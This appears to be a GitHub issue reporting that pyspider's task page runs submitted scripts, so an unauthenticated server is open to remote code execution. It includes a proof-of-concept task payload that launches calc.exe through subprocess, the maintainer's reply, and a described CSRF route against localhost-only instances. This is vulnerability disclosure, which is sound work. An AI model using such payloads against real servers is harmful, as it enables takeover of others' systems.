pyspider icon indicating copy to clipboard operation
pyspider copied to clipboard

Published 20 hours ago verified publisher icon binux

Script content needs security check which could cause RCE

Open lvf233 opened this issue 4 years ago • 2 comments

🐛 Bug Report

Script content needs security check which could cause RCE

To Reproduce

  1. start up a pyspider-server.
  2. access the task webpage.
  3. upload a task with malicious script.
  4. bingo!

Expected behavior

the server will execute code what you set(it run with a calc.exe that i set to prove this vuln).

Test script or set of commands reproducing this issue

post this task as follow to server.

data = {
'webdav_mode': 'false',
'script':  '''from pyspider.libs.base_handler import *
import socket
import os
import sys
import time
import subprocess

def test():
    try:
        p=subprocess.call(["calc.exe",])
    except:
        pass
####  
class Handler(BaseHandler):
    def on_start(self):
        test()
''',
'task':'''{
  "process": {
    "callback": "on_start"
  },
  "project": "pyspider_test",
  "taskid": "data:,on_start",
  "url": "data:,on_start"
}
'''
}

Environment

pyspider v0.3.10 system ubuntu 18.04 & windows 10 version1909

lvf233 avatar Jan 19 '21 04:01 lvf233

Yes, script running is the fundamental of this project. There's a warning on readme that you can setup auth to the task page.

binux avatar Jan 19 '21 04:01 binux

Yes, script running is the fundamental of this project. There's a warning on readme that you can setup auth to the task page.

yeah , most people still start pyspider with the default configuration, could force the modification of this default setting ? meanwhile, we also designed such a scene, which is opened in the case of only allowing localhost to access, while supporting JavaScript (using other components for rendering). We use the CSRF method to request the local pyspider to achieve the same effect.

lvf233 avatar Jan 19 '21 05:01 lvf233